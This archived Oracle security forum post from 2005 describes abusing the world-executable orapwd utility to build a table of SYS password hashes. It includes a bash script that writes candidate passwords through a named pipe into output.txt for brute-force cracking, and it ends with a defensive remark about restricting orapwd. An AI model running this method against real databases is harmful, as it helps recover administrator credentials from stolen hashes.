Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
Oracle Security >> Oracle Security tools >> orapwd to crack sys hash?
(Message started by: Pete Finnigan on Sep 20th, 2005, 1:51pm)

Title: orapwd to crack sys hash?
Post by Pete Finnigan on Sep 20th, 2005, 1:51pm
Hi,

I've being playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>.
But any OS user can execute it and create his own password-file. If the password-file doesn't exists its created, if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happens to have the hash value of SYS's password (very unprobable I think) you could generate all posible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 password, from A to Z, and it took 0.6 seconds):

#!/bin/bash

# Auteur: I.A. Saez Scheihing

mknod pijp p

while true; do cat < pijp  >> output.txt; done &

orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
...
...
..
rm pijp

# end script

So after 'password=' you could try all password combinations. After completion you would find all posible hashes in file output.txt!


By the way:
I don't think every one should be allowd to execute orapwd. This tool is meant for oracle only.

kind regards,

Ivan



Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board